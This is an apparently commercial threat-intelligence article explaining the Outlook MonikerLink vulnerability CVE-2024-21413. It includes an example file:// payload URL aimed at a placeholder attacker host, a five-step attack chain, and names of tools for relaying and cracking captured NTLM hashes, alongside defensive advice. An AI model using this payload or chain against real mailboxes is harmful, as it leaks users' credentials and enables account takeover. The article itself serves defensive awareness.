CVE REFERENCE | CRITICAL VULNERABILITY
Active ThreatUpdated 10 min read

CVE-2024-21413: Outlook MonikerLink NTLM Credential Theft

A single malicious hyperlink in an Outlook email, no click required, no attachment to open, silently leaks Windows NTLM credentials to any attacker who can send you an email

9.8
CVSS Score
None
User interaction beyond preview
Bypassed
Outlook Protected View status
KEV
CISA confirmed exploitation

SponsoredRetool

Retool's new app builder is where AI-generated code ships safely

Building apps with AI is easy. Getting them to production safely is another story.

Start building for free today

CVE-2024-21413, named 'MonikerLink' by Checkpoint Research, is a critical Microsoft Outlook vulnerability patched in February 2024 that allows an attacker to silently steal a victim's Windows NTLMv2 credentials by sending them a specially crafted email, no attachment to open, no macro to enable, and no hyperlink to click. Simply previewing the email in Outlook's Reading Pane is sufficient. The attack exploits a bypass in Outlook's Protected View mechanism using an exclamation mark appended to a file:// moniker URL, causing Windows to initiate an outbound NTLM authentication handshake to an attacker-controlled server and transmit the victim's Net-NTLMv2 hash.

The MonikerLink Mechanism: Exclamation Mark Bypass

Windows Monikers are COM object naming constructs that associate URL protocol schemes with object handlers. The file:// moniker causes Windows to initiate access to a UNC network path (\server\share) via SMB, which triggers Windows NTLM authentication as part of the SMB protocol handshake.

Outlook normally identifies file:// URLs pointing to UNC paths as potentially dangerous and applies Protected View isolation, blocking automatic processing. CVE-2024-21413 bypasses this entirely. Checkpoint Research discovered that appending an exclamation mark and arbitrary text to the file:// URL, for example, file:///\\attacker.com\share\file!arbitrary_text, caused Outlook's URL classifier to misidentify the link type, bypassing the Protected View check.

When Outlook processes this link during email preview (an automatic action), it triggers the Windows file:// moniker handler. Windows initiates an SMB connection to the specified server. SMB authentication transmits the victim's Net-NTLMv2 hash as part of the standard Windows authentication challenge-response. The attacker's server captures this hash without the user clicking anything.

From Hash Capture to Credential Compromise

The captured Net-NTLMv2 hash is not the plaintext password, but it opens two distinct attack paths:

Offline cracking: Net-NTLMv2 hashes can be cracked with hashcat or John the Ripper. Common or moderate-complexity passwords crack in minutes to hours on modern GPU hardware. Any password under 8 characters or following common patterns is at high risk.

NTLM Relay attacks: The attacker can relay the captured authentication in real time to another service, for example, capturing the victim's authentication and immediately replaying it to the organization's Exchange server, SharePoint, or file shares to authenticate as the victim. Tools like Responder (for capture) and ntlmrelayx (for relay) are publicly available and widely used. Extended Protection for Authentication (EPA) on target services is the primary defense against relay.

For high-privilege targets (IT administrators, C-suite, service accounts), a captured and cracked or relayed hash can translate directly to domain-level access.

Free daily briefing

Briefings like this, every morning before 9am.

Threat intel, active CVEs, and campaign alerts, distilled for practitioners. 50,000+ subscribers. No noise.

Historical Context: The Outlook NTLM Leak Pattern

CVE-2024-21413 is the latest in a series of Outlook vulnerabilities enabling NTLM credential theft via automatic content processing:

  • CVE-2023-23397 (March 2023, patched as an APT28 zero-day): Malicious calendar reminder with a UNC path in the reminder sound file field caused automatic NTLM authentication on reminder popup, no email open or click required.
  • CVE-2024-21413 (February 2024): Malicious file:// hyperlink with exclamation mark bypass in email body triggers NTLM authentication on email preview.

Both vulnerabilities exploit the fundamental behavior of Windows NTLM authentication, any application that triggers access to a UNC network path on behalf of a Windows user will cause that user's NTLM credentials to be transmitted to the path's server. Outlook's rich content processing repeatedly creates surfaces where attacker-controlled content can trigger this behavior.

1

Malicious Email Crafted

Attacker creates email body containing a hyperlink with crafted file:// moniker: file:///\\attacker-server\share\file!anytext. The exclamation mark suffix bypasses Outlook's URL safety classifier.

2

Email Delivered to Target

Email arrives in victim's inbox. No attachment, no macro, no suspicious indicator beyond a hyperlink that appears as a normal-looking file reference.

3

Outlook Previews Email, Moniker Processed

Victim selects the email in Outlook's Reading Pane (or opens it). Outlook processes the email body content including the file:// moniker. The exclamation mark bypass prevents Protected View from sandboxing the link.

4

Windows Initiates NTLM Authentication

Windows file:// moniker handler initiates an SMB connection to attacker's server. Windows NTLM challenge-response transmits the victim's Net-NTLMv2 hash, automatically, silently, before the user takes any further action.

5

Hash Cracked or Relayed

Attacker receives Net-NTLMv2 hash. Either cracks it offline to obtain plaintext password, or relays the authentication in real time to Exchange/SharePoint/file shares to access resources as the victim.

Indicators of Compromise

Detection for CVE-2024-21413 exploitation:

Subscribe to unlock Indicators of Compromise

Free subscribers unlock full IOC lists, Sigma detection rules, remediation steps, and every daily briefing.

Remediation

Steps in order of priority:

Subscribe to unlock Remediation & Mitigation steps

Free subscribers unlock full IOC lists, Sigma detection rules, remediation steps, and every daily briefing.

The bottom line

CVE-2024-21413 represents an attack category that confounds traditional security awareness training, there is no malicious attachment to avoid, no macro warning to dismiss, and no suspicious link to refuse to click. The credential theft happens automatically during normal email reading. Blocking outbound SMB at the perimeter is the single most impactful control and should already be in place as a security baseline. For organizations that do not currently block outbound port 445, discovering this via a MonikerLink attack is a far worse outcome than implementing the control proactively.

This analysis is generic — the platform version scores threats like this against your own stack.

Frequently asked questions

Is CVE-2024-21413 related to CVE-2023-23397 (the Outlook calendar zero-day)?

They share the same class of attack, Outlook processing attacker-controlled content that triggers Windows NTLM authentication to an external server, but are distinct vulnerabilities using different attack surfaces. CVE-2023-23397 used malicious calendar reminder sound file paths. CVE-2024-21413 uses malicious hyperlinks in email bodies with a different Protected View bypass mechanism.

Can the Net-NTLMv2 hash captured by an attacker be used directly to log in?

Net-NTLMv2 hashes cannot be directly used for pass-the-hash authentication (unlike NTLM hashes). However, they can be cracked offline to reveal the plaintext password, or relayed in real time to authenticate as the victim to other services via NTLM relay attacks, a well-established attack technique using tools like Responder and ntlmrelayx.

Does this affect Outlook on the web (OWA) or Outlook for Mac?

No. CVE-2024-21413 affects the Windows Outlook desktop client only. Outlook on the web (OWA) runs in a browser sandbox that does not have access to Windows NTLM authentication. Outlook for Mac uses a different code base without Windows moniker processing and is not affected.

What is the difference between a Net-NTLMv2 hash and an NTLM hash, and which can be passed?

An NTLM hash (also called an NT hash) is the stored representation of a user's password in the Windows SAM database or Active Directory. NTLM hashes can be used directly for pass-the-hash attacks against NTLM-authenticated services without knowing the plaintext password. A Net-NTLMv2 hash is a challenge-response authentication token captured during an NTLM authentication handshake over the network. Net-NTLMv2 hashes cannot be used for pass-the-hash because they are not the raw password hash; they are tied to the specific challenge issued during that authentication attempt. However, Net-NTLMv2 hashes can be cracked offline to recover the plaintext password, or relayed in real time to authenticate to other services using NTLM relay tools like ntlmrelayx. CVE-2024-21413 captures Net-NTLMv2 hashes.

Can organizations that have disabled NTLM authentication still be affected by CVE-2024-21413?

No, if NTLM is fully disabled. If an organization has configured Active Directory to enforce Kerberos-only authentication and completely disabled NTLM via Group Policy (Network Security: Restrict NTLM: Incoming NTLM traffic = Deny all accounts), there are no NTLM credentials to capture. However, very few organizations have fully disabled NTLM because it is still used as a fallback in many Windows scenarios including workgroup authentication, some legacy applications, and connections to IP addresses rather than hostnames where Kerberos SPN matching fails. Completely disabling NTLM typically requires testing and remediation of compatibility issues before it is operationally viable.

Does Microsoft Defender for Office 365 (Safe Links) protect against CVE-2024-21413?

Partially. Microsoft Defender for Office 365 Safe Links rewrites URLs in email bodies to go through Microsoft's link-checking proxy. If the malicious file:// moniker URL passes through Safe Links rewriting, clicking it would go to Microsoft's proxy which would likely block the external UNC path. However, CVE-2024-21413 exploits automatic processing during email preview, not a user click, so whether Safe Links provides protection depends on implementation details of how Outlook processes the link during preview versus user-click scenarios. The most reliable protection is blocking outbound SMB (TCP 445) at the perimeter firewall, which prevents NTLM credential transmission regardless of Safe Links behavior, and applying the February 2024 patch.

Sources & references

  1. Checkpoint Research, MonikerLink
  2. Microsoft Security Advisory, CVE-2024-21413
  3. CISA Known Exploited Vulnerabilities Catalog

Free resources

25
Free download

Critical CVE Reference Card 2025–2026

25 actively exploited vulnerabilities with CVSS scores, exploit status, and patch availability. Print it, pin it, share it with your SOC team.

No spam. Unsubscribe anytime.

Free download

Ransomware Incident Response Playbook

Step-by-step 24-hour IR checklist covering detection, containment, eradication, and recovery. Built for SOC teams, IR leads, and CISOs.

No spam. Unsubscribe anytime.

Free newsletter

Get threat intel before your inbox does.

50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, daily, no spam.

Unsubscribe anytime. We never sell your data.

Eric Bang
Author

Founder & Cybersecurity Evangelist, Decryption Digest

Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals every morning.

Black Hat Giveaway

Win a $2,495 Black Hat pass.

Full-access to Black Hat USA 2026 in Las Vegas. Subscribe free to enter.

Joins Decryption Digest daily briefing. Unsubscribe anytime.

Giveaway: Black Hat USA 2026 Full-Access Pass ($2,495 value)

Details →
Daily Briefing

Subscribe to enter the giveaway

Every subscriber is automatically entered. You also get daily threat intel every morning: zero-days, ransomware, and nation-state campaigns. Free. No spam.

Already subscribed? You're already entered.

Giveaway

Win a $2,495 Black Hat USA 2026 pass.